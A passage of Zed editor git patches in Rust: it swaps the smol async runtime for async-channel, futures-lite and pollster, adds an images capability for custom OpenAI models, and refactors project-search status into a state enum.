kill_running_server(pid, &server_paths)?; } - smol::block_on(spawn_server(&server_paths)).map_err(ExecuteProxyError::SpawnServer)?; + gpui::block_on(spawn_server(&server_paths)).map_err(ExecuteProxyError::SpawnServer)?; std::fs::read_to_string(&server_paths.pid_file) .and_then(|contents| { contents.parse::().map_err(|_| { @@ -826,7 +833,7 @@ pub(crate) fn execute_proxy( } }); - if let Err(forwarding_result) = smol::block_on(async move { + if let Err(forwarding_result) = gpui::block_on(async move { futures::select! { result = stdin_task.fuse() => result.map_err(ExecuteProxyError::StdinTask), result = stdout_task.fuse() => result.map_err(ExecuteProxyError::StdoutTask), @@ -834,7 +841,7 @@ pub(crate) fn execute_proxy( } }) { log::error!("encountered error while forwarding messages: {forwarding_result:#}",); - if !matches!(smol::block_on(check_server_running(server_pid)), Ok(true)) { + if !matches!(gpui::block_on(check_server_running(server_pid)), Ok(true)) { log::error!("server exited unexpectedly"); return Err(ExecuteProxyError::ServerNotRunning( ProxyLaunchError::ServerNotRunning, diff --git a/crates/search/Cargo.toml b/crates/search/Cargo.toml index 4213aa39a046e9..dac98f5245f11e 100644 --- a/crates/search/Cargo.toml +++ b/crates/search/Cargo.toml @@ -27,6 +27,7 @@ bitflags.workspace = true collections.workspace = true editor.workspace = true fs.workspace = true +futures-lite.workspace = true futures.workspace = true gpui.workspace = true language.workspace = true @@ -36,7 +37,6 @@ project.workspace = true serde.workspace = true serde_json.workspace = true settings.workspace = true -smol.workspace = true theme.workspace = true theme_settings.workspace = true ui.workspace = true diff --git a/crates/search/src/buffer_search.rs b/crates/search/src/buffer_search.rs index 8170d303eb8ca3..41dda49efa3224 100644 --- a/crates/search/src/buffer_search.rs +++ b/crates/search/src/buffer_search.rs @@ -1942,10 +1942,10 @@ mod tests { SELECTION_HIGHLIGHT_DEBOUNCE_TIMEOUT, SearchSettings, SelectionEffects, display_map::DisplayRow, test::editor_test_context::EditorTestContext, }; + use futures::stream::StreamExt as _; use gpui::{Hsla, TestAppContext, UpdateGlobal, VisualTestContext}; use language::{Buffer, Point}; use settings::{SearchSettingsContent, SettingsStore}; - use smol::stream::StreamExt as _; use unindent::Unindent as _; use util_macros::perf; diff --git a/crates/search/src/project_search.rs b/crates/search/src/project_search.rs index c79937ab7ad12f..6a092818a02bef 100644 --- a/crates/search/src/project_search.rs +++ b/crates/search/src/project_search.rs @@ -483,7 +483,7 @@ impl ProjectSearch { while let Some(new_ranges) = new_ranges.next().await { // `new_ranges.next().await` likely never gets hit while still pending so `async_task` // will not reschedule, starving other front end tasks, insert a yield point for that here - smol::future::yield_now().await; + futures_lite::future::yield_now().await; project_search .update(cx, |project_search, cx| { project_search.match_ranges.extend(new_ranges); diff --git a/crates/sidebar/Cargo.toml b/crates/sidebar/Cargo.toml index 97e09439800067..be525a5c6e5802 100644 --- a/crates/sidebar/Cargo.toml +++ b/crates/sidebar/Cargo.toml @@ -17,6 +17,7 @@ default = [] [dependencies] acp_thread.workspace = true action_log.workspace = true +async-channel.workspace = true agent.workspace = true agent-client-protocol.workspace = true agent_settings.workspace = true @@ -38,7 +39,6 @@ remote_connection.workspace = true serde.workspace = true serde_json.workspace = true settings.workspace = true -smol.workspace = true telemetry.workspace = true theme.workspace = true theme_settings.workspace = true diff --git a/crates/sidebar/src/sidebar.rs b/crates/sidebar/src/sidebar.rs index 80243a873baf47..ebf2518d68d05f 100644 --- a/crates/sidebar/src/sidebar.rs +++ b/crates/sidebar/src/sidebar.rs @@ -3407,7 +3407,7 @@ impl Sidebar { thread_id: Option, neighbor: Option<&ThreadMetadata>, thread_folder_paths: Option<&PathList>, - in_flight_archive: Option<(Task<()>, smol::channel::Sender<()>)>, + in_flight_archive: Option<(Task<()>, async_channel::Sender<()>)>, window: &mut Window, cx: &mut Context, ) { @@ -3498,12 +3498,12 @@ impl Sidebar { thread_id: ThreadId, roots: Vec, cx: &mut Context, - ) -> Option<(Task<()>, smol::channel::Sender<()>)> { + ) -> Option<(Task<()>, async_channel::Sender<()>)> { if roots.is_empty() { return None; } - let (cancel_tx, cancel_rx) = smol::channel::bounded::<()>(1); + let (cancel_tx, cancel_rx) = async_channel::bounded::<()>(1); let task = cx.spawn(async move |_this, cx| { match Self::archive_worktree_roots(roots, cancel_rx, cx).await { Ok(ArchiveWorktreeOutcome::Success) => { @@ -3530,7 +3530,7 @@ impl Sidebar { async fn archive_worktree_roots( roots: Vec, - cancel_rx: smol::channel::Receiver<()>, + cancel_rx: async_channel::Receiver<()>, cx: &mut gpui::AsyncApp, ) -> anyhow::Result { let mut completed_persists: Vec<(i64, thread_worktree_archive::RootPlan)> = Vec::new(); diff --git a/crates/sqlez/Cargo.toml b/crates/sqlez/Cargo.toml index 5f4a0bef67efe3..f5db6f96a0dfb6 100644 --- a/crates/sqlez/Cargo.toml +++ b/crates/sqlez/Cargo.toml @@ -16,7 +16,7 @@ indoc.workspace = true libsqlite3-sys.workspace = true log.workspace = true parking_lot.workspace = true -smol.workspace = true +pollster.workspace = true sqlformat.workspace = true thread_local = "1.1.4" util.workspace = true diff --git a/crates/sqlez/src/thread_safe_connection.rs b/crates/sqlez/src/thread_safe_connection.rs index 7b3630cdf65f90..1de70a06636b89 100644 --- a/crates/sqlez/src/thread_safe_connection.rs +++ b/crates/sqlez/src/thread_safe_connection.rs @@ -344,7 +344,7 @@ mod test { PRAGMA case_sensitive_like=TRUE; "}); - let _ = smol::block_on(builder.build()).unwrap().deref(); + let _ = pollster::block_on(builder.build()).unwrap().deref(); })); } diff --git a/crates/terminal/Cargo.toml b/crates/terminal/Cargo.toml index 1f6082e0bfcfec..ad1a0753f52e82 100644 --- a/crates/terminal/Cargo.toml +++ b/crates/terminal/Cargo.toml @@ -20,10 +20,12 @@ path = "src/terminal.rs" doctest = false [dependencies] +async-channel.workspace = true alacritty_terminal.workspace = true anyhow.workspace = true collections.workspace = true futures.workspace = true +futures-lite.workspace = true gpui.workspace = true itertools.workspace = true libc.workspace = true @@ -34,7 +36,6 @@ schemars.workspace = true serde.workspace = true settings.workspace = true sysinfo.workspace = true -smol.workspace = true task.workspace = true theme.workspace = true theme_settings.workspace = true diff --git a/crates/terminal/src/terminal.rs b/crates/terminal/src/terminal.rs index 74118d372d91cf..e47cc2bb8d0d21 100644 --- a/crates/terminal/src/terminal.rs +++ b/crates/terminal/src/terminal.rs @@ -26,6 +26,7 @@ use alacritty_terminal::{ }, }; use anyhow::{Context as _, Result, bail}; +use futures_lite::future::yield_now; use log::trace; use futures::{ @@ -39,12 +40,12 @@ use mappings::mouse::{ scroll_report, }; +use async_channel::{Receiver, Sender}; use collections::{HashMap, VecDeque}; use futures::StreamExt; use pty_info::{ProcessIdGetter, PtyProcessInfo}; use serde::{Deserialize, Serialize}; use settings::Settings; -use smol::channel::{Receiver, Sender}; use task::{HideStrategy, Shell, SpawnInTerminal}; use terminal_hyperlinks::RegexSearches; use terminal_settings::{AlternateScroll, CursorShape, TerminalSettings}; @@ -736,7 +737,7 @@ impl TerminalBuilder { } if events.is_empty() && !wakeup { - smol::future::yield_now().await; + yield_now().await; break 'outer; } @@ -749,7 +750,7 @@ impl TerminalBuilder { this.process_event(event, cx); } })?; - smol::future::yield_now().await; + yield_now().await; } } anyhow::Ok(()) @@ -2565,6 +2566,7 @@ mod tests { index::{Column, Line, Point as AlacPoint}, term::cell::Cell, }; + use async_channel::Receiver; use collections::HashMap; use gpui::{ Entity, Modifiers, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, @@ -2572,7 +2574,6 @@ mod tests { }; use parking_lot::Mutex; use rand::{Rng, distr, rngs::StdRng}; - use smol::channel::Receiver; use task::{Shell, ShellBuilder}; #[cfg(not(target_os = "windows"))] @@ -2591,7 +2592,7 @@ mod tests { command: &str, args: &[&str], ) -> (Entity, Receiver>) { - let (completion_tx, completion_rx) = smol::channel::unbounded(); + let (completion_tx, completion_rx) = async_channel::unbounded(); let args: Vec = args.iter().map(|s| s.to_string()).collect(); let (program, args) = ShellBuilder::new(&Shell::System, false).build(Some(command.to_owned()), &args); @@ -2744,7 +2745,7 @@ mod tests { cx.executor().allow_parking(); - let (completion_tx, completion_rx) = smol::channel::unbounded(); + let (completion_tx, completion_rx) = async_channel::unbounded(); let builder = cx .update(|cx| { TerminalBuilder::new( @@ -2770,7 +2771,7 @@ mod tests { // Build an empty command, which will result in a tty shell spawned. let terminal = cx.new(|cx| builder.subscribe(cx)); - let (event_tx, event_rx) = smol::channel::unbounded::(); + let (event_tx, event_rx) = async_channel::unbounded::(); cx.update(|cx| { cx.subscribe(&terminal, move |_, e, _| { event_tx.send_blocking(e.clone()).unwrap(); @@ -2841,7 +2842,7 @@ mod tests { .unwrap(); let terminal = cx.new(|cx| builder.subscribe(cx)); - let (event_tx, event_rx) = smol::channel::unbounded::(); + let (event_tx, event_rx) = async_channel::unbounded::(); cx.update(|cx| { cx.subscribe(&terminal, move |_, e, _| { event_tx.send_blocking(e.clone()).unwrap(); @@ -2876,7 +2877,7 @@ mod tests { async fn test_terminal_no_exit_on_spawn_failure(cx: &mut TestAppContext) { cx.executor().allow_parking(); - let (completion_tx, completion_rx) = smol::channel::unbounded(); + let (completion_tx, completion_rx) = async_channel::unbounded(); let (program, args) = ShellBuilder::new(&Shell::System, false) .build(Some("asdasdasdasd".to_owned()), &["@@@@@".to_owned()]); let builder = cx diff --git a/crates/workspace/Cargo.toml b/crates/workspace/Cargo.toml index 203980873d2915..0200f1b7d570e7 100644 --- a/crates/workspace/Cargo.toml +++ b/crates/workspace/Cargo.toml @@ -36,6 +36,7 @@ clock.workspace = true collections.workspace = true component.workspace = true db.workspace = true +futures-lite.workspace = true fs.workspace = true futures.workspace = true git.workspace = true diff --git a/crates/workspace/src/workspace.rs b/crates/workspace/src/workspace.rs index a6d966bb23fddc..8b54a995a87e07 100644 --- a/crates/workspace/src/workspace.rs +++ b/crates/workspace/src/workspace.rs @@ -17,7 +17,6 @@ mod persistence; pub mod searchable; mod security_modal; pub mod shared_screen; -use db::smol::future::yield_now; pub use shared_screen::SharedScreen; pub mod focus_follows_mouse; mod status_bar; @@ -3389,7 +3388,7 @@ impl Workspace { .unwrap_or(false); if focus_changed { - yield_now().await; + futures_lite::future::yield_now().await; } } diff --git a/crates/worktree/Cargo.toml b/crates/worktree/Cargo.toml index 6d8faad3dc495a..5aac6f24173def 100644 --- a/crates/worktree/Cargo.toml +++ b/crates/worktree/Cargo.toml @@ -31,6 +31,7 @@ test-support = [ [dependencies] anyhow.workspace = true +async-channel.workspace = true async-lock.workspace = true chardetng.workspace = true clock.workspace = true @@ -53,7 +54,6 @@ serde.workspace = true serde_json.workspace = true settings.workspace = true smallvec.workspace = true -smol.workspace = true sum_tree.workspace = true text.workspace = true tracing.workspace = true diff --git a/crates/worktree/src/worktree.rs b/crates/worktree/src/worktree.rs index 4a85e91c5a71a0..3f58448d312ae6 100644 --- a/crates/worktree/src/worktree.rs +++ b/crates/worktree/src/worktree.rs @@ -31,6 +31,7 @@ use gpui::{ use ignore::IgnoreStack; use language::{ByteContent, DiskState, FILE_ANALYSIS_BYTES, analyze_byte_content}; +use async_channel::{self, Sender}; use parking_lot::Mutex; use paths::{local_settings_folder_name, local_vscode_folder_name}; use postage::{ @@ -45,7 +46,6 @@ use rpc::{ pub use settings::WorktreeId; use settings::{Settings, SettingsLocation, SettingsStore}; use smallvec::{SmallVec, smallvec}; -use smol::channel::{self, Sender}; use std::{ any::Any, borrow::Borrow as _, @@ -127,8 +127,8 @@ impl fmt::Debug for LoadedBinaryFile { pub struct LocalWorktree { snapshot: LocalSnapshot, - scan_requests_tx: channel::Sender, - path_prefixes_to_scan_tx: channel::Sender, + scan_requests_tx: async_channel::Sender, + path_prefixes_to_scan_tx: async_channel::Sender, is_scanning: (watch::Sender, watch::Receiver), snapshot_subscriptions: VecDeque<(usize, oneshot::Sender<()>)>, _background_scanner_tasks: Vec>, @@ -483,8 +483,8 @@ impl Worktree { .block_on(snapshot.insert_entry(entry, fs.as_ref())); } - let (scan_requests_tx, scan_requests_rx) = channel::unbounded(); - let (path_prefixes_to_scan_tx, path_prefixes_to_scan_rx) = channel::unbounded(); + let (scan_requests_tx, scan_requests_rx) = async_channel::unbounded(); + let (path_prefixes_to_scan_tx, path_prefixes_to_scan_rx) = async_channel::unbounded(); let mut worktree = LocalWorktree { share_private_files, next_entry_id, @@ -1119,8 +1119,8 @@ impl LocalWorktree { } fn restart_background_scanners(&mut self, cx: &Context) { - let (scan_requests_tx, scan_requests_rx) = channel::unbounded(); - let (path_prefixes_to_scan_tx, path_prefixes_to_scan_rx) = channel::unbounded(); + let (scan_requests_tx, scan_requests_rx) = async_channel::unbounded(); + let (path_prefixes_to_scan_tx, path_prefixes_to_scan_rx) = async_channel::unbounded(); self.scan_requests_tx = scan_requests_tx; self.path_prefixes_to_scan_tx = path_prefixes_to_scan_tx; @@ -1138,8 +1138,8 @@ impl LocalWorktree { fn start_background_scanner( &mut self, - scan_requests_rx: channel::Receiver, - path_prefixes_to_scan_rx: channel::Receiver, + scan_requests_rx: async_channel::Receiver, + path_prefixes_to_scan_rx: async_channel::Receiver, cx: &Context, ) { let snapshot = self.snapshot(); @@ -3929,8 +3929,8 @@ struct BackgroundScanner { fs_case_sensitive: bool, status_updates_tx: UnboundedSender, executor: BackgroundExecutor, - scan_requests_rx: channel::Receiver, - path_prefixes_to_scan_rx: channel::Receiver, + scan_requests_rx: async_channel::Receiver, + path_prefixes_to_scan_rx: async_channel::Receiver, next_entry_id: Arc, phase: BackgroundScannerPhase, watcher: Arc, @@ -4035,7 +4035,7 @@ impl BackgroundScanner { Box::pin(futures::stream::pending()) }; - let (scan_job_tx, scan_job_rx) = channel::unbounded(); + let (scan_job_tx, scan_job_rx) = async_channel::unbounded(); { let mut state = self.state.lock().await; state.snapshot.scan_id += 1; @@ -4494,7 +4494,7 @@ impl BackgroundScanner { self.state.lock().await.snapshot.scan_id += 1; - let (scan_job_tx, scan_job_rx) = channel::unbounded(); + let (scan_job_tx, scan_job_rx) = async_channel::unbounded(); log::debug!( "received fs events {:?}", relative_paths @@ -4559,7 +4559,7 @@ impl BackgroundScanner { .await; (state.snapshot.clone(), ignore_stack, abs_path) }; - let (scan_job_tx, scan_job_rx) = channel::unbounded(); + let (scan_job_tx, scan_job_rx) = async_channel::unbounded(); self.update_ignore_statuses_for_paths( scan_job_tx, prev_snapshot, @@ -4571,7 +4571,7 @@ impl BackgroundScanner { } async fn forcibly_load_paths(&self, paths: &[Arc]) -> bool { - let (scan_job_tx, scan_job_rx) = channel::unbounded(); + let (scan_job_tx, scan_job_rx) = async_channel::unbounded(); { let mut state = self.state.lock().await; let root_path = state.snapshot.abs_path.clone(); @@ -4614,7 +4614,7 @@ impl BackgroundScanner { async fn scan_dirs( &self, enable_progress_updates: bool, - scan_jobs_rx: channel::Receiver, + scan_jobs_rx: async_channel::Receiver, ) { if self .status_updates_tx @@ -5138,7 +5138,7 @@ impl BackgroundScanner { prev_snapshot: LocalSnapshot, ignores_to_update: Vec<(Arc, IgnoreStack)>, ) { - let (ignore_queue_tx, ignore_queue_rx) = channel::unbounded(); + let (ignore_queue_tx, ignore_queue_rx) = async_channel::unbounded(); { for (parent_abs_path, ignore_stack) in ignores_to_update { ignore_queue_tx diff --git a/crates/zed/src/main.rs b/crates/zed/src/main.rs index 627d514f6c469e..234179f9a53b7a 100644 --- a/crates/zed/src/main.rs +++ b/crates/zed/src/main.rs @@ -337,7 +337,7 @@ fn main() { session_id.clone(), KeyValueStore::from_app_db(&app_db), )); - + let background_executor = app.background_executor(); crashes::init( InitCrashHandler { session_id, @@ -358,6 +358,7 @@ fn main() { |task| { app.background_executor().spawn(task).detach(); }, + move |duration| background_executor.timer(duration), ); let (open_listener, mut open_rx) = OpenListener::new(); diff --git a/crates/zed/src/zed/visual_tests.rs b/crates/zed/src/zed/visual_tests.rs index 982db08782207a..610621f480f7bf 100644 --- a/crates/zed/src/zed/visual_tests.rs +++ b/crates/zed/src/zed/visual_tests.rs @@ -441,7 +441,7 @@ mod tests { let mut cx = VisualTestAppContext::new(gpui_platform::current_platform(false)); let app_state = init_visual_test(&mut cx); - smol::block_on(async { + gpui::block_on(async { app_state .fs .as_fake() @@ -456,7 +456,7 @@ mod tests { .await; }); - let workspace_result = smol::block_on(open_test_workspace(app_state, &mut cx)); + let workspace_result = gpui::block_on(open_test_workspace(app_state, &mut cx)); assert!( workspace_result.is_ok(), "Failed to open workspace: {:?}", @@ -482,7 +482,7 @@ mod tests { let mut cx = VisualTestAppContext::new(gpui_platform::current_platform(false)); let app_state = init_visual_test(&mut cx); - smol::block_on(async { + gpui::block_on(async { app_state .fs .as_fake() @@ -498,10 +498,10 @@ mod tests { .await; }); - let workspace = smol::block_on(open_test_workspace(app_state, &mut cx)) + let workspace = gpui::block_on(open_test_workspace(app_state, &mut cx)) .expect("Failed to open workspace"); - smol::block_on(async { + gpui::block_on(async { wait_for_ui_stabilization(&cx).await; let screenshot_result = cx.capture_screenshot(workspace.into()); From 67906ebdff4b21a9e50a3e55be3306de3e2031e2 Mon Sep 17 00:00:00 2001 From: Matt Van Horn Date: Fri, 24 Apr 2026 03:36:46 -0700 Subject: [PATCH 005/231] language_models: Honor images capability for custom OpenAI models (#54223) ## Summary Users who add custom OpenAI models under `language_models.openai.available_models` can set `capabilities.images: true` to declare that the endpoint accepts image inputs. Today, that setting is silently ignored: the Agent panel's image-attach button stays disabled regardless, and the only workaround is to switch to a built-in OpenAI model, attach the image, and switch back. Root cause: `Model::Custom` does not carry a `supports_images` field, and the OpenAI provider's `supports_images()` for the `Custom` arm hardcodes `false`. ## Changes 1. `crates/settings_content/src/language_model.rs`: add `images: bool` to `OpenAiModelCapabilities` with `#[serde(default)]` so existing settings.json files keep working unchanged. 2. `crates/open_ai/src/open_ai.rs`: add `supports_images: bool` to `Model::Custom` with a matching serde default. 3. `crates/language_models/src/provider/open_ai.rs`: pass `model.capabilities.images` into the `Model::Custom` variant in `provided_models`, and return the stored value from `supports_images()` for `Custom`. Existing `Model::Custom { .. }` match sites (`completion.rs:829`, various in `open_ai.rs`) all use `..` so they continue to compile without change. ## Testing - `cargo check -p settings_content -p open_ai -p language_models`: clean. - I was not able to complete `./script/clippy` locally: the build stalled on the first-time `webrtc-sys` download for livekit-rust-sdks (TLS close_notify failure on docs.rs mirror). Happy to rerun once CI has cached artifacts. - Manually verified the capability plumbing by tracing: settings.json -> `OpenAiModelCapabilities.images` -> `Model::Custom { supports_images }` -> `supports_images()` -> `Thread::prompt_capabilities` -> `SessionCapabilities.supports_images()` -> `build_add_context_menu` gate in `thread_view.rs`. ## Related Issues Closes #50752 Release Notes: - Fixed custom OpenAI models ignoring the `capabilities.images` setting in `language_models.openai.available_models`. This contribution was developed with AI assistance (Codex). --------- Co-authored-by: Matt Van Horn <455140+mvanhorn@users.noreply.github.com> --- crates/language_models/src/provider/open_ai.rs | 10 +++++----- crates/open_ai/src/open_ai.rs | 6 ++++++ crates/settings_content/src/language_model.rs | 3 +++ 3 files changed, 14 insertions(+), 5 deletions(-) diff --git a/crates/language_models/src/provider/open_ai.rs b/crates/language_models/src/provider/open_ai.rs index f5ee65c8d85ff6..97bb5ef1e4d64b 100644 --- a/crates/language_models/src/provider/open_ai.rs +++ b/crates/language_models/src/provider/open_ai.rs @@ -182,6 +182,7 @@ impl LanguageModelProvider for OpenAiLanguageModelProvider { max_completion_tokens: model.max_completion_tokens, reasoning_effort: model.reasoning_effort, supports_chat_completions: model.capabilities.chat_completions, + supports_images: model.capabilities.images, }, ); } @@ -328,11 +329,10 @@ impl LanguageModel for OpenAiLanguageModel { | Model::FivePointFourPro | Model::O1 | Model::O3 => true, - Model::ThreePointFiveTurbo - | Model::Four - | Model::FourTurbo - | Model::O3Mini - | Model::Custom { .. } => false, + Model::ThreePointFiveTurbo | Model::Four | Model::FourTurbo | Model::O3Mini => false, + Model::Custom { + supports_images, .. + } => *supports_images, } } diff --git a/crates/open_ai/src/open_ai.rs b/crates/open_ai/src/open_ai.rs index 0109efbe293ee0..cc54d20a91568d 100644 --- a/crates/open_ai/src/open_ai.rs +++ b/crates/open_ai/src/open_ai.rs @@ -106,6 +106,8 @@ pub enum Model { reasoning_effort: Option, #[serde(default = "default_supports_chat_completions")] supports_chat_completions: bool, + #[serde(default = "default_supports_images")] + supports_images: bool, }, } @@ -113,6 +115,10 @@ const fn default_supports_chat_completions() -> bool { true } +const fn default_supports_images() -> bool { + true +} + impl Model { pub fn default_fast() -> Self { Self::FiveMini diff --git a/crates/settings_content/src/language_model.rs b/crates/settings_content/src/language_model.rs index 635b58f988d6ad..c14f854a724ce6 100644 --- a/crates/settings_content/src/language_model.rs +++ b/crates/settings_content/src/language_model.rs @@ -257,12 +257,15 @@ pub struct OpenAiCompatibleSettingsContent { pub struct OpenAiModelCapabilities { #[serde(default = "default_true")] pub chat_completions: bool, + #[serde(default = "default_true")] + pub images: bool, } impl Default for OpenAiModelCapabilities { fn default() -> Self { Self { chat_completions: default_true(), + images: default_true(), } } } From 0ddb7e404ad500abb8866870e1da364042f8e662 Mon Sep 17 00:00:00 2001 From: Xiaobo Liu Date: Fri, 24 Apr 2026 18:40:20 +0800 Subject: [PATCH 006/231] editor: Make parse_blocks synchronous since it has no await points (#54756) Release Notes: - N/A Signed-off-by: Xiaobo Liu --- crates/editor/src/hover_popover.rs | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/crates/editor/src/hover_popover.rs b/crates/editor/src/hover_popover.rs index 24fdce51ba6379..e43ae09c0d6526 100644 --- a/crates/editor/src/hover_popover.rs +++ b/crates/editor/src/hover_popover.rs @@ -205,8 +205,7 @@ pub fn hover_at_inlay( let language_registry = project.read_with(cx, |p, _| p.languages().clone()); let blocks = vec![inlay_hover.tooltip]; - let parsed_content = - parse_blocks(&blocks, Some(&language_registry), None, cx).await; + let parsed_content = parse_blocks(&blocks, Some(&language_registry), None, cx); let scroll_handle = ScrollHandle::new(); @@ -494,8 +493,7 @@ fn show_hover( text: format!("Unicode character U+{:02X}", invisible as u32), kind: HoverBlockKind::PlainText, }]; - let parsed_content = - parse_blocks(&blocks, language_registry.as_ref(), None, cx).await; + let parsed_content = parse_blocks(&blocks, language_registry.as_ref(), None, cx); let scroll_handle = ScrollHandle::new(); let subscription = this .update(cx, |_, cx| { @@ -536,7 +534,7 @@ fn show_hover( let blocks = hover_result.contents; let language = hover_result.language; let parsed_content = - parse_blocks(&blocks, language_registry.as_ref(), language, cx).await; + parse_blocks(&blocks, language_registry.as_ref(), language, cx); let scroll_handle = ScrollHandle::new(); hover_highlights.push(range.clone()); let subscription = this @@ -623,7 +621,7 @@ fn same_diagnostic_hover(editor: &Editor, snapshot: &EditorSnapshot, anchor: Anc .unwrap_or(false) } -async fn parse_blocks( +fn parse_blocks( blocks: &[HoverBlock], language_registry: Option<&Arc>, language: Option>, From b11dc21d479515938a3916a0a528eb6636d46c6b Mon Sep 17 00:00:00 2001 From: Oleksiy Syvokon Date: Fri, 24 Apr 2026 13:45:16 +0300 Subject: [PATCH 007/231] project_search: Fix project search status text and refactor search state (#54753) This change fixes a small bug where we were showing "Loading project..." even when in fact we had already started the search. It also refactors three booleans in the `SearchState` enum, so that it's harder to make similar mistakes in the future. Release Notes: - N/A --- crates/agent/src/tools/grep_tool.rs | 2 +- .../tests/integration/integration_tests.rs | 2 +- crates/project/src/project_search.rs | 8 +- crates/project/src/search.rs | 1 + .../tests/integration/project_tests.rs | 3 +- crates/project_benchmarks/src/main.rs | 12 +- .../remote_server/src/remote_editing_tests.rs | 10 +- crates/search/src/project_search.rs | 125 +++++++++++------- 8 files changed, 99 insertions(+), 64 deletions(-) diff --git a/crates/agent/src/tools/grep_tool.rs b/crates/agent/src/tools/grep_tool.rs index 9ccebd80e85e48..485084a406e3f8 100644 --- a/crates/agent/src/tools/grep_tool.rs +++ b/crates/agent/src/tools/grep_tool.rs @@ -196,7 +196,7 @@ impl AgentTool for GrepTool { has_more_matches = true; break; } - Some(SearchResult::WaitingForScan) => continue, + Some(SearchResult::WaitingForScan | SearchResult::Searching) => continue, None => break, }; if ranges.is_empty() { diff --git a/crates/collab/tests/integration/integration_tests.rs b/crates/collab/tests/integration/integration_tests.rs index b7479f956249df..d5e4d046b4edb0 100644 --- a/crates/collab/tests/integration/integration_tests.rs +++ b/crates/collab/tests/integration/integration_tests.rs @@ -5295,7 +5295,7 @@ async fn test_project_search( "Unexpectedly reached search limit in tests. If you do want to assert limit-reached, change this panic call." ) } - SearchResult::WaitingForScan => {} + SearchResult::WaitingForScan | SearchResult::Searching => {} }; } diff --git a/crates/project/src/project_search.rs b/crates/project/src/project_search.rs index 2db893538c837e..e865bb4d5cb6c7 100644 --- a/crates/project/src/project_search.rs +++ b/crates/project/src/project_search.rs @@ -424,8 +424,12 @@ impl Search { worktree.as_local().map(|local| local.scan_complete()) }); if let Some(scan_complete) = scan_complete { - _ = results_tx.send(SearchResult::WaitingForScan).await; - scan_complete.await; + let mut scan_complete = pin!(scan_complete); + if scan_complete.as_mut().now_or_never().is_none() { + _ = results_tx.send(SearchResult::WaitingForScan).await; + scan_complete.await; + _ = results_tx.send(SearchResult::Searching).await; + } } let (mut snapshot, worktree_settings) = worktree diff --git a/crates/project/src/search.rs b/crates/project/src/search.rs index b04bf1289741ed..83b4c585f1454e 100644 --- a/crates/project/src/search.rs +++ b/crates/project/src/search.rs @@ -26,6 +26,7 @@ pub enum SearchResult { }, LimitReached, WaitingForScan, + Searching, } #[derive(Clone, Copy, PartialEq)] diff --git a/crates/project/tests/integration/project_tests.rs b/crates/project/tests/integration/project_tests.rs index 984d1de057c1d2..6997435eb2a215 100644 --- a/crates/project/tests/integration/project_tests.rs +++ b/crates/project/tests/integration/project_tests.rs @@ -12313,7 +12313,8 @@ async fn search( SearchResult::Buffer { buffer, ranges } => { results.entry(buffer).or_insert(ranges); } - SearchResult::LimitReached | SearchResult::WaitingForScan => {} + SearchResult::LimitReached | SearchResult::WaitingForScan | SearchResult::Searching => { + } } } Ok(results diff --git a/crates/project_benchmarks/src/main.rs b/crates/project_benchmarks/src/main.rs index cdeb8ed780ecea..054b5eb95a5627 100644 --- a/crates/project_benchmarks/src/main.rs +++ b/crates/project_benchmarks/src/main.rs @@ -210,11 +210,13 @@ fn main() -> Result<(), anyhow::Error> { first_match = Some(time); println!("First match found after {time:?}"); } - if let SearchResult::Buffer { ranges, .. } = match_result { - matched_files += 1; - matched_chunks += ranges.len(); - } else { - break; + match match_result { + SearchResult::Buffer { ranges, .. } => { + matched_files += 1; + matched_chunks += ranges.len(); + } + SearchResult::LimitReached => break, + SearchResult::WaitingForScan | SearchResult::Searching => continue, } } let elapsed = timer.elapsed(); diff --git a/crates/remote_server/src/remote_editing_tests.rs b/crates/remote_server/src/remote_editing_tests.rs index 6f2c2e3f22369b..825c0ba26c0474 100644 --- a/crates/remote_server/src/remote_editing_tests.rs +++ b/crates/remote_server/src/remote_editing_tests.rs @@ -200,9 +200,13 @@ async fn do_search_and_assert( let mut buffers = Vec::new(); for expected_path in expected_paths { - let response = receiver.rx.recv().await.unwrap(); - let SearchResult::Buffer { buffer, .. } = response else { - panic!("incorrect result"); + let buffer = loop { + let response = receiver.rx.recv().await.unwrap(); + match response { + SearchResult::Buffer { buffer, .. } => break buffer, + SearchResult::LimitReached => panic!("incorrect result"), + SearchResult::WaitingForScan | SearchResult::Searching => continue, + } }; buffer.update(&mut cx, |buffer, cx| { assert_eq!( diff --git a/crates/search/src/project_search.rs b/crates/search/src/project_search.rs index 6a092818a02bef..00966436595136 100644 --- a/crates/search/src/project_search.rs +++ b/crates/search/src/project_search.rs @@ -235,15 +235,44 @@ pub struct ProjectSearch { active_query: Option, last_search_query_text: Option, search_id: usize, - no_results: Option, - limit_reached: bool, - waiting_for_scan: bool, + search_state: SearchState, search_history_cursor: SearchHistoryCursor, search_included_history_cursor: SearchHistoryCursor, search_excluded_history_cursor: SearchHistoryCursor, _excerpts_subscription: Subscription, } +#[derive(Clone, Copy, Debug, Default, PartialEq, Eq)] +enum SearchState { + #[default] + Idle, + Running(SearchActivity), + Completed(SearchCompletion), +} + +#[derive(Clone, Copy, Debug, PartialEq, Eq)] +enum SearchActivity { + Searching, + WaitingForScan, +} + +#[derive(Clone, Copy, Debug, PartialEq, Eq)] +enum SearchCompletion { + NoResults, + Results { limit_reached: bool }, +} + +impl SearchState { + fn limit_reached(self) -> bool { + matches!( + self, + SearchState::Completed(SearchCompletion::Results { + limit_reached: true + }) + ) + } +} + #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] enum InputPanel { Query, @@ -298,9 +327,7 @@ impl ProjectSearch { active_query: None, last_search_query_text: None, search_id: 0, - no_results: None, - limit_reached: false, - waiting_for_scan: false, + search_state: SearchState::Idle, search_history_cursor: Default::default(), search_included_history_cursor: Default::default(), search_excluded_history_cursor: Default::default(), @@ -323,9 +350,11 @@ impl ProjectSearch { active_query: self.active_query.clone(), last_search_query_text: self.last_search_query_text.clone(), search_id: self.search_id, - no_results: self.no_results, - limit_reached: self.limit_reached, - waiting_for_scan: false, + search_state: if self.pending_search.is_some() { + SearchState::Idle + } else { + self.search_state + }, search_history_cursor: self.search_history_cursor.clone(), search_included_history_cursor: self.search_included_history_cursor.clone(), search_excluded_history_cursor: self.search_excluded_history_cursor.clone(), @@ -413,6 +442,7 @@ impl ProjectSearch { self.search_id += 1; self.active_query = Some(query); self.match_ranges.clear(); + self.search_state = SearchState::Running(SearchActivity::Searching); self.pending_search = Some(cx.spawn(async move |project_search, cx| { let SearchResults { rx, _task_handle } = search; @@ -423,19 +453,16 @@ impl ProjectSearch { project_search .excerpts .update(cx, |excerpts, cx| 